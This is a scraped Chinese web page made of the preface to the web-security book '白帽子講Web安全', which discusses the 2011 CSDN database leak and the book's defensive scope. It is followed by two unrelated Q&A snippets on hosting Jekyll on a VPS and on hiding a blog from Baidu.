因此在本書中,我認為最可貴的不是那一個個工業化的解決方案,而是在解決這些問題時,背後的思考過程。我們不是要做一個能夠解決問題的方案,而是要做一個能夠「漂亮地」解決問題的方案。這是每一名優秀的安全工程師所應有的追求。 然而在當今的互聯網行業中,對安全的重視程度普遍不高。有統計顯示,互聯網公司對安全的投入不足收入的百分之一。
在2011年歲末之際,中國互聯網突然捲入了一場有史以來最大的安全危機。12月21日,國內最大的開發者社區CSDN被黑客在互聯網上公布了600萬注冊用戶的數據。更糟糕的是,CSDN在資料庫中明文保存了用戶的密碼。接下來如同一場盛大的交響樂,黑客隨後陸續公布了網易、人人、天涯、貓撲、多玩等多家大型網站的資料庫,一時間風聲鶴唳,草木皆兵。
這些數據其實在黑客的地下世界中已經輾轉流傳了多年,牽扯到了一條巨大的黑色產業鏈。這次的偶然事件使之浮出水面,公之於眾,也讓用戶清醒地認識到中國互聯網的安全現狀有多麼糟糕。
以往類似的事件我都會在博客上說點什麼,但這次我保持了沉默。因為一來知道此種狀況已經多年,網站只是在為以前的不作為而買單;二來要解決「拖庫」的問題,其實是要解決整個互聯網公司的安全問題,遠非保證一個資料庫的安全這么簡單。這不是通過一段文字、一篇文章就能夠講清楚的。但我想最好的答案,可以在本書中找到。
經歷這場危機之後,希望整個中國互聯網,在安全問題的認識上,能夠有一個新的高度。那這場危機也就物有所值,或許還能藉此契機成就中國互聯網的一場安全啟蒙運動。
這是我的第一本書,也是我堅持自己一個人寫完的書,因此可以在書中盡情地闡述自己的安全世界觀,且對書中的任何錯漏之處以及不成熟的觀點都沒有可以推卸責任的借口。
由於工作繁忙,寫此書只能利用業余時間,交稿時間多次推遲,深感寫書的不易。但最終能成書,則有賴於各位親朋的支持,以及編輯的鼓勵,在此深表感謝。本書中很多地方未能寫得更為深入細致,實乃精力有限所致,尚請多多包涵。 在安全圈子裡,素有「白帽」、「黑帽」一說。
黑帽子是指那些造成破壞的黑客,而白帽子則是研究安全,但不造成破壞的黑客。白帽子均以建設更安全的互聯網為己任。
我於2008年開始在國內互聯網行業中倡導白帽子的理念,並聯合了一些主要互聯網公司的安全工程師,建立了白帽子社區,旨在交流工作中遇到的各種問題,以及經驗心得。
本書名為《白帽子講Web安全》,即是站在白帽子的視角,講述Web安全的方方面面。雖然也剖析攻擊原理,但更重要的是如何防範這些問題。同時也希望「白帽子」這一理念,能夠更加的廣為人知,為中國互聯網所接受。 全書分為4大篇共18章,讀者可以通過瀏覽目錄以進一步了解各篇章的內容。在有的章節末尾,還附上了筆者曾經寫過的一些博客文章,可以作為延伸閱讀以及本書正文的補充。
第一篇 我的安全世界觀是全書的綱領。在此篇中先回顧了安全的歷史,然後闡述了筆者對安全的看法與態度,並提出了一些思考問題的方式以及做事的方法。理解了本篇,就能明白全書中所涉及的解決方案在抉擇時的取捨。
第二篇 客戶端腳本安全就當前比較流行的客戶端腳本攻擊進行了深入闡述。當網站的安全做到一定程度後,黑客可能難以再找到類似注入攻擊、腳本執行等高風險的漏洞,從而可能將注意力轉移到客戶端腳本攻擊上。
客戶端腳本安全與瀏覽器的特性息息相關,因此對瀏覽器的深入理解將有助於做好客戶端腳本安全的解決方案。
如果讀者所要解決的問題比較嚴峻,比如網站的安全是從零開始,則建議跳過此篇,先閱讀下一篇「伺服器端應用安全」,解決優先順序更高的安全問題。
第三篇 伺服器端應用安全就常見的伺服器端應用安全問題進行了闡述。這些問題往往能引起非常嚴重的後果,在網站的安全建設之初需要優先解決這些問題,避免留下任何隱患。
第四篇 互聯網公司安全運營提出了一個大安全運營的思想。安全是一個持續的過程,最終仍然要由安全工程師來保證結果。
在本篇中,首先就互聯網業務安全問題進行了一些討論,這些問題對於互聯網公司來說有時候會比漏洞更為重要。
在接下來的兩章中,首先闡述了安全開發流程的實施過程,以及筆者積累的一些經驗。然後談到了公司安全團隊的職責,以及如何建立一個健康完善的安全體系。
本書也可以當做一本安全參考書,讀者在遇到問題時,可以挑選任何所需要的章節進行閱讀。 感謝我的妻子,她的支持是對我最大的鼓勵。本書最後的成書時日,是陪伴在她的病床邊完成的,我將銘記一生。
感謝我的父母,是他們養育了我,並一直在背後默默地支持我的事業,使我最終能有機會在這里寫下這些話。
感謝我的公司阿里巴巴集團,它營造了良好的技術與實踐氛圍,使我能夠有今天的積累。同時也感謝在工作中一直給予我幫助和鼓勵的同事、上司,他們包括但不限於:魏興國、湯城、劉志生、侯欣傑、林松英、聶萬全、謝雄欽、徐敏、劉坤、李澤洋、肖力、葉怡愷。
感謝季昕華先生為本書作序,他一直是所有安全工作者的楷模與學習的對象。
也感謝博文視點的張春雨先生以及他的團隊,是他們的努力使本書最終能與廣大讀者見面。他們的專業意見給了我很多的幫助。
最後特別感謝我的同事周拓,他對本書提出了很多有建設性的意見。
吳翰清
2012年1月於杭州
㈨ jekyll和vps可以一起用嗎
可以
1. 首先安裝ruby環境.
2. 默認會安裝ruby gems包管理工具.(如果官方鏡像不給力請嘗試更換ruby-china的鏡像源)
3. 通過gem包安裝jekyll,命令如:gem install jekyll.
4. 上述方式僅安裝了jekyll,如果你使用Gemfile來管理依賴那麼你還需要安裝bundler.然後使用命令bundle install / jekyll server即可運行網站. (注意埠是否開放)
5. 這種情況下,必然增加許多繁瑣的操作如更新代碼(可以寫個插件自動拉取最新版本代碼),重新編譯,代碼管理,web安全等問題.
ps:自己搭建也有個好處,github禁用了jekyll插件,放到自己vps上那就可以為所欲為了.
如果還有其他問題歡迎追問,如果有所幫助敬請採納.
㈩ 如何讓自己製作的網頁或者博客以及QQ空間不要在百度中搜索到相關內容
到國外的博客上建博客。並在博客代碼里加屏蔽搜索引擎代碼;
或者用自動翻譯網頁---worldlingo翻譯成德文;
博客文章里的內容使用生僻表達方法,包括使用比較純正的文言文。